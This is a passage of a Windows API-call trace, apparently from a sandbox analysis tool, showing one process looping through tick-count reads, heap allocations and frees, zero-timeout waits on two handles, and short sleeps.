GetTickCount () returned 0x215e3c8 [0189.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.260] GetTickCount () returned 0x215e3c8 [0189.260] GetTickCount () returned 0x215e3c8 [0189.260] GetTickCount () returned 0x215e3c8 [0189.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.260] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.260] GetTickCount () returned 0x215e3c8 [0189.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.260] GetTickCount () returned 0x215e3c8 [0189.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0189.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.264] GetTickCount () returned 0x215ec5e [0189.264] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0189.264] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.264] GetTickCount () returned 0x215ec5e [0189.264] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.264] GetTickCount () returned 0x215ec5e [0189.264] GetTickCount () returned 0x215ec5e [0189.264] GetTickCount () returned 0x215ec5e [0189.264] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.264] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.264] GetTickCount () returned 0x215ec5e [0189.264] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.265] GetTickCount () returned 0x215ec5e [0189.265] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.265] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0189.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.270] GetTickCount () returned 0x215f4f4 [0189.270] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b30 [0189.270] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.270] GetTickCount () returned 0x215f4f4 [0189.271] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.271] GetTickCount () returned 0x215f4f4 [0189.271] GetTickCount () returned 0x215f4f4 [0189.271] GetTickCount () returned 0x215f4f4 [0189.271] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.271] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.271] GetTickCount () returned 0x215f4f4 [0189.271] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.271] GetTickCount () returned 0x215f4f4 [0189.271] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.271] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0189.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.274] GetTickCount () returned 0x215fd99 [0189.274] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0189.274] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.274] GetTickCount () returned 0x215fd99 [0189.274] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.274] GetTickCount () returned 0x215fd99 [0189.274] GetTickCount () returned 0x215fd99 [0189.274] GetTickCount () returned 0x215fd99 [0189.274] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.274] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.274] GetTickCount () returned 0x215fd99 [0189.274] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.274] GetTickCount () returned 0x215fd99 [0189.274] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.274] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0189.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.278] GetTickCount () returned 0x216062f [0189.278] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.278] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.278] GetTickCount () returned 0x216062f [0189.278] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.278] GetTickCount () returned 0x216062f [0189.278] GetTickCount () returned 0x216062f [0189.278] GetTickCount () returned 0x216062f [0189.278] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.278] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.278] GetTickCount () returned 0x216062f [0189.278] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.278] GetTickCount () returned 0x216062f [0189.278] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.278] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.281] GetTickCount () returned 0x2160ec5 [0189.281] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0189.281] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.281] GetTickCount () returned 0x2160ec5 [0189.282] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.282] GetTickCount () returned 0x2160ec5 [0189.282] GetTickCount () returned 0x2160ec5 [0189.282] GetTickCount () returned 0x2160ec5 [0189.282] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.282] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.282] GetTickCount () returned 0x2160ec5 [0189.282] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.282] GetTickCount () returned 0x2160ec5 [0189.282] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.282] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0189.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.285] GetTickCount () returned 0x216175b [0189.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.285] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.285] GetTickCount () returned 0x216175b [0189.285] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.286] GetTickCount () returned 0x216175b [0189.286] GetTickCount () returned 0x216175b [0189.286] GetTickCount () returned 0x216175b [0189.286] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.286] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.286] GetTickCount () returned 0x216175b [0189.286] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.286] GetTickCount () returned 0x216175b [0189.286] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.286] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.289] GetTickCount () returned 0x2162001 [0189.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0189.289] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.289] GetTickCount () returned 0x2162001 [0189.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.289] GetTickCount () returned 0x2162001 [0189.289] GetTickCount () returned 0x2162001 [0189.289] GetTickCount () returned 0x2162001 [0189.289] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.289] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.289] GetTickCount () returned 0x2162001 [0189.289] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.289] GetTickCount () returned 0x2162001 [0189.289] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.289] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0189.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.294] GetTickCount () returned 0x2162897 [0189.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0189.294] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.294] GetTickCount () returned 0x2162897 [0189.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.294] GetTickCount () returned 0x2162897 [0189.294] GetTickCount () returned 0x2162897 [0189.294] GetTickCount () returned 0x2162897 [0189.294] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.294] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.294] GetTickCount () returned 0x2162897 [0189.294] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.294] GetTickCount () returned 0x2162897 [0189.294] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.295] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0189.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.300] GetTickCount () returned 0x216312d [0189.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0189.300] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.300] GetTickCount () returned 0x216312d [0189.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.300] GetTickCount () returned 0x216312d [0189.300] GetTickCount () returned 0x216312d [0189.300] GetTickCount () returned 0x216312d [0189.300] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.300] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.300] GetTickCount () returned 0x216312d [0189.300] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.300] GetTickCount () returned 0x216312d [0189.300] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.300] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0189.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.303] GetTickCount () returned 0x21639c3 [0189.303] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0189.303] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.304] GetTickCount () returned 0x21639c3 [0189.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.304] GetTickCount () returned 0x21639c3 [0189.304] GetTickCount () returned 0x21639c3 [0189.304] GetTickCount () returned 0x21639c3 [0189.304] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.304] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.304] GetTickCount () returned 0x21639c3 [0189.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798c0 [0189.304] GetTickCount () returned 0x21639c3 [0189.304] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e798c0 | out: hHeap=0x2150000) returned 1 [0189.304] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0189.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.307] GetTickCount () returned 0x2164269 [0189.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.307] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.307] GetTickCount () returned 0x2164269 [0189.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.307] GetTickCount () returned 0x2164269 [0189.307] GetTickCount () returned 0x2164269 [0189.307] GetTickCount () returned 0x2164269 [0189.307] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.307] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.307] GetTickCount () returned 0x2164269 [0189.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.307] GetTickCount () returned 0x2164269 [0189.307] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.307] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.311] GetTickCount () returned 0x2164aff [0189.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0189.311] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.311] GetTickCount () returned 0x2164aff [0189.312] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.312] GetTickCount () returned 0x2164aff [0189.312] GetTickCount () returned 0x2164aff [0189.312] GetTickCount () returned 0x2164aff [0189.312] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79770 | out: hHeap=0x2150000) returned 1 [0189.312] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.312] GetTickCount () returned 0x2164aff [0189.312] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.312] GetTickCount () returned 0x2164aff [0189.312] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79860 | out: hHeap=0x2150000) returned 1 [0189.312] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0189.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.315] GetTickCount () returned 0x2165395 [0189.315] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0189.315] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.315] GetTickCount () returned 0x2165395 [0189.315] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.315] GetTickCount () returned 0x2165395 [0189.315] GetTickCount () returned 0x2165395 [0189.315] GetTickCount () returned 0x2165395 [0189.315] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.315] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.315] GetTickCount () returned 0x2165395 [0189.315] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.315] GetTickCount () returned 0x2165395 [0189.315] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.315] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0189.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.318] GetTickCount () returned 0x2165c2b [0189.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651b0 [0189.318] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.318] GetTickCount () returned 0x2165c2b [0189.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.319] GetTickCount () returned 0x2165c2b [0189.319] GetTickCount () returned 0x2165c2b [0189.319] GetTickCount () returned 0x2165c2b [0189.319] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.319] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.319] GetTickCount () returned 0x2165c2b [0189.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.319] GetTickCount () returned 0x2165c2b [0189.319] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.319] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651b0 | out: hHeap=0x2150000) returned 1 [0189.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.322] GetTickCount () returned 0x21664d0 [0189.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.322] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.322] GetTickCount () returned 0x21664d0 [0189.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.322] GetTickCount () returned 0x21664d0 [0189.322] GetTickCount () returned 0x21664d0 [0189.322] GetTickCount () returned 0x21664d0 [0189.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.322] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.322] GetTickCount () returned 0x21664d0 [0189.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.322] GetTickCount () returned 0x21664d0 [0189.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.329] GetTickCount () returned 0x2166d66 [0189.329] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0189.330] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.330] GetTickCount () returned 0x2166d66 [0189.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.330] GetTickCount () returned 0x2166d66 [0189.330] GetTickCount () returned 0x2166d66 [0189.330] GetTickCount () returned 0x2166d66 [0189.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.330] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.330] GetTickCount () returned 0x2166d66 [0189.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e795c0 [0189.330] GetTickCount () returned 0x2166d66 [0189.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e795c0 | out: hHeap=0x2150000) returned 1 [0189.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0189.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.333] GetTickCount () returned 0x21675fc [0189.333] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0189.333] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.333] GetTickCount () returned 0x21675fc [0189.333] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79770 [0189.333] GetTickCount () returned 0x21675fc [0189.333] GetTickCount () returned 0x21675fc [0189.333] GetTickCount () returned 0x21675fc [0189.333] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79770 | out: hHeap=0x2150000) returned 1 [0189.333] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.333] GetTickCount () returned 0x21675fc [0189.333] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.333] GetTickCount () returned 0x21675fc [0189.333] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.333] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0189.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.336] GetTickCount () returned 0x2167ea2 [0189.336] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0189.336] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.336] GetTickCount () returned 0x2167ea2 [0189.337] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.337] GetTickCount () returned 0x2167ea2 [0189.337] GetTickCount () returned 0x2167ea2 [0189.337] GetTickCount () returned 0x2167ea2 [0189.337] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.337] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.337] GetTickCount () returned 0x2167ea2 [0189.337] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.337] GetTickCount () returned 0x2167ea2 [0189.337] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.337] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0189.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.340] GetTickCount () returned 0x2168738 [0189.340] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0189.340] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.340] GetTickCount () returned 0x2168738 [0189.340] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.340] GetTickCount () returned 0x2168738 [0189.340] GetTickCount () returned 0x2168738 [0189.340] GetTickCount () returned 0x2168738 [0189.340] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.340] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.340] GetTickCount () returned 0x2168738 [0189.340] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.340] GetTickCount () returned 0x2168738 [0189.340] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.340] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0189.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.345] GetTickCount () returned 0x2168fce [0189.345] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0189.345] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.345] GetTickCount () returned 0x2168fce [0189.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.346] GetTickCount () returned 0x2168fce [0189.346] GetTickCount () returned 0x2168fce [0189.346] GetTickCount () returned 0x2168fce [0189.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79560 | out: hHeap=0x2150000) returned 1 [0189.346] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0189.346] GetTickCount () returned 0x2168fce [0189.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79710 [0189.346] GetTickCount () returned 0x2168fce [0189.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e79710 | out: hHeap=0x2150000) returned 1 [0189.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0189.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0189.349] GetTickCount () returned 0x2169864 [0189.349] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0189.349] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0189.349] GetTickCount () returned 0x2169864 [0189.349] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79560 [0189.349] GetTickCount () returned 0x2169864 [0189.349] GetTickCount () returned 0x2169864 [0189.349] GetTickCount () returned 0x2169864 [0189.349] HeapFree (in: 